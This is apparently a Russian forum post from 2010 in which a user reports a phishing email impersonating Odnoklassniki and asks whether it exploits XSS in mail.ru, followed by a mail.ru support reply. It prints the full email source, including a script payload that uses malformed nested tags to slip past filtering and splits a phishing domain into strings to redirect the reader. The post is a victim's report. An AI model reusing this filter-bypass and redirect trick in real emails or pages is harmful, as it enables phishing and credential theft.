Ни о чём →
XSS в mail.ru?
Только что, моей матери пришло письмо на почту, с темой «Блокировка вашего аккаунта».
Естественно она сообщила об этом мне. Что бы сильно не отвлекаться от своих дел быстренько настроил ее аккаунт в evolution'e и получил письма. Открыл письмо и увидел в теле "<<script"
Открыл исходный текст письма, и вот что там увидел:
Заметив, что при генерации ссылки ничего противозаконного не получается — решил попробовать открыть письмо через веб-интерфейс… Меня перекинуло насайт Одноклассниковфишинг-версию одной соц. сети!
Как следует поступить в этом случае?
UPD.
Пришло сообщение от службы поддержки
Открыл исходный текст письма, и вот что там увидел:
From bezotveta@odnoklassniki.ru Sat Sep 25 17:11:07 2010
Return-path: <visss@srv10-h-st.jino.ru>
Received: from [81.177.139.63] (port=49915 helo=srv10-h-st.jino.ru) by
mx84.mail.ru with esmtp id 1OzUWx-0001zQ-00 for s**@list.ru;
Sat, 25 Sep 2010 17:11:07 +0400
Received-SPF: none (mx84.mail.ru: 81.177.139.63 is neither permitted nor
denied by domain of srv10-h-st.jino.ru) client-ip=81.177.139.63;
envelope-from=visss@srv10-h-st.jino.ru; helo=srv10-h-st.jino.ru;
X-Mru-BL: 0:0:0
X-Mru-PTR: srv10-h-st.jino.ru
X-Mru-NR: 1
X-Mru-OF: Linux (ethernet/modem)
X-Mru-RC: RU
Received: by srv10-h-st.jino.ru (Postfix, from userid 2108) id E4189D44160;
Sat, 25 Sep 2010 17:11:06 +0400 (MSD)
To: s***@list.ru
Subject:
=?UTF-8?Q?=D0=91=D0=BB=D0=BE=D0=BA=D0=B8=D1=80=D0=BE=D0=B2=D0=BA=D0=B0_=D0=B2=D0=B0=D1=88=D0=B5=D0=B3=D0=BE_=D0=B0=D0=BA=D0=BA=D0=B0=D1=83=D0=BD=D1=82=D0=B0?=
MIME-Version: 1.0
Content-type: text/html; charset="UTF-8"
X-Priority: 3 (Normal)
From: =?UTF-8?Q?=D0=9E=D0=B4=D0=BD=D0=BE=D0=BA=D0=BB=D0=B0=D1=81=D1=81=D0=BD=D0=B8=D0=BA=D0=B8_?= <bezotveta@odnoklassniki.ru>
Message-ID: <172562218.20100925171057@592537083920>
Date: Sat, 25 Sep 2010 17:11:06 +0400 (MSD)
X-Spam: Not detected
X-Mras: Ok
X-Evolution-Source: pop://s***@pop.list.ru/
Content-Transfer-Encoding: 8bit
<<script<script>script> var tag1 = "http://s4487.odnokla"; var tag2 = "ssniki.ant"; var email1 = "iod"; var email2 = ".ru"; location.href = tag1 + tag2 + email1 + email2; <<script><script>/script><script><script> Сейчас будет произведено автоматическое перенаправление на сайт odnoklassniki.ru
Если это письмо доставлено вам по ошибке,просто проигнорируйте его! 0 6XSWE922LL 2Z1ZDLSRVPK R0 6XSWE922LL 2Z1ZDLSRVPK R0 6XSWE922LL 2Z1ZDLSRVPK R0 6XSWE922LL 2Z1ZDLSRVPK R
Заметив, что при генерации ссылки ничего противозаконного не получается — решил попробовать открыть письмо через веб-интерфейс… Меня перекинуло на
Как следует поступить в этом случае?
UPD.
Пришло сообщение от службы поддержки
Здравствуйте.
Mail.Ru не имеет никакого отношения к сайту odnoklassniki.ru. По всем
проблемам, возникающим при работе данного сайта, пожалуйста, обращайтесь в
службу поддержки odnoklassniki.ru.
С уважением, Ксения К.
Служба поддержки пользователей
почтовой системы Mail.ru
При ответах, пожалуйста, полностью цитируйте переписку.
26.12.2009 15:52+0300